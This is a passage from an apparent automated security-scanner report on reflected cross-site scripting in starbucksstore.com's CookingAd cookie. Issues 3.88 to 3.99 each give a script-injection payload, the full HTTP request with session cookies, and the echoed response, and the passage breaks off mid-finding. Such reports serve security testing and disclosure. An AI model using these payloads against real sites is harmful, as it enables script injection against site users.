3.88. http://www.starbucksstore.com/mya/track.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /mya/track.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860c7</script><script>alert(1)</script>9b9756a0816 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mya/track.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB860c7</script><script>alert(1)</script>9b9756a0816;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18382
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:07 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Cont
...[SNIP]...
. */
   var s_pageName="/mya/track.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/mya/track.asp"
   var s_prop3="SBPTPAHP1SHTB860C7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9B9756A0816"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/mya/track.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""
...[SNIP]...

3.89. http://www.starbucksstore.com/products/include/SearchNav.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/include/SearchNav.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6b5c</script><script>alert(1)</script>9153adaaf8c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/include/SearchNav.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd6b5c</script><script>alert(1)</script>9153adaaf8c;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:17 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
Name="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shprodli.asp"
   var s_prop3="SBPTPAHP1SHTBD6B5C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9153ADAAF8C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shprodli.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9="Search Listing: Internal: "
   var s_prop10=""
   /* E-commerce Variables */
   
...[SNIP]...

3.90. http://www.starbucksstore.com/products/shabotus.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shabotus.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a282</script><script>alert(1)</script>e390fba785c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shabotus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3a282</script><script>alert(1)</script>e390fba785c;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14484
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:38 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
products/shabotus.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shabotus.asp"
   var s_prop3="SBPTPAHP1SHTB3A282</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>E390FBA785C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shabotus.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_
...[SNIP]...

3.91. http://www.starbucksstore.com/products/shourplg.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shourplg.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d15c0</script><script>alert(1)</script>f0bd362f13 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shourplg.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd15c0</script><script>alert(1)</script>f0bd362f13;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25377
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:10 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
products/shourplg.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shourplg.asp"
   var s_prop3="SBPTPAHP1SHTBD15C0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F0BD362F13"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shourplg.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_
...[SNIP]...

3.92. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodde.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa301</script><script>alert(1)</script>0485f7d85aa was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shprodde.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfa301</script><script>alert(1)</script>0485f7d85aa;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:31 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
ines. */
   var s_pageName="HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="HomePage"
   var s_prop3="SBPTPAHP1SHTBFA301</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0485F7D85AA"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""

...[SNIP]...

3.93. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodde.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 109e9</script><script>alert(1)</script>b870a4bcca was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shprodde.asp?SKU=309195 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB109e9</script><script>alert(1)</script>b870a4bcca;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11887
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:26 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
ageName="Detail Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Detail Page : 309195 : "
   var s_prop3="SBPTPAHP1SHTB109E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B870A4BCCA"
   var s_prop4=""
   var s_prop5="309195 : "
   var s_prop6="/products/shprodde.asp?SKU=309195"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_
...[SNIP]...

3.94. http://www.starbucksstore.com/products/shprodli.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodli.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9727f</script><script>alert(1)</script>9636677bff4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shprodli.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB9727f</script><script>alert(1)</script>9636677bff4;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:00 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
Name="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shprodli.asp"
   var s_prop3="SBPTPAHP1SHTB9727F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9636677BFF4"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shprodli.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9="Search Listing: Internal: "
   var s_prop10=""
   /* E-commerce Variables */
   
...[SNIP]...

3.95. http://www.starbucksstore.com/products/sitemap.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/sitemap.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 798a2</script><script>alert(1)</script>711801d72b9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/sitemap.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB798a2</script><script>alert(1)</script>711801d72b9;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21157
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:26 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
"/products/sitemap.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/sitemap.asp"
   var s_prop3="SBPTPAHP1SHTB798A2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>711801D72B9"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/sitemap.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_s
...[SNIP]...

3.96. http://www.starbucksstore.com/products/terms.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/terms.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d241</script><script>alert(1)</script>487db803af4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/terms.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2d241</script><script>alert(1)</script>487db803af4;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15962
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:01 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
ame="/products/terms.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/terms.asp"
   var s_prop3="SBPTPAHP1SHTB2D241</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>487DB803AF4"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/terms.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_sta
...[SNIP]...

3.97. http://www.starbucksstore.com/small-office-coffee [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /small-office-coffee

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae82</script><script>alert(1)</script>675c202d2cd was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /small-office-coffee HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfae82</script><script>alert(1)</script>675c202d2cd;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20742
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:15 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Cont
...[SNIP]...
ice HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Small Office HomePage"
   var s_prop3="SBPTPAHP1SHTBFAE82</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>675C202D2CD"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/small-office-coffee/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign="
...[SNIP]...

3.98. http://www.starbucksstore.com/starbucks-coffee-delivery [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-delivery

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3e71</script><script>alert(1)</script>14d1501ca39 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-coffee-delivery HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBb3e71</script><script>alert(1)</script>14d1501ca39;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19580
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:16 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       
       <meta HTTP-EQUIV="Conten
...[SNIP]...
at Home HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks at Home HomePage"
   var s_prop3="SBPTPAHP1SHTBB3E71</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>14D1501CA39"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-delivery/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_camp
...[SNIP]...

3.99. http://www.starbucksstore.com/starbucks-coffee-delivery/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-delivery/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfd3e</script><script>alert(1)</script>0ff078f663a was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

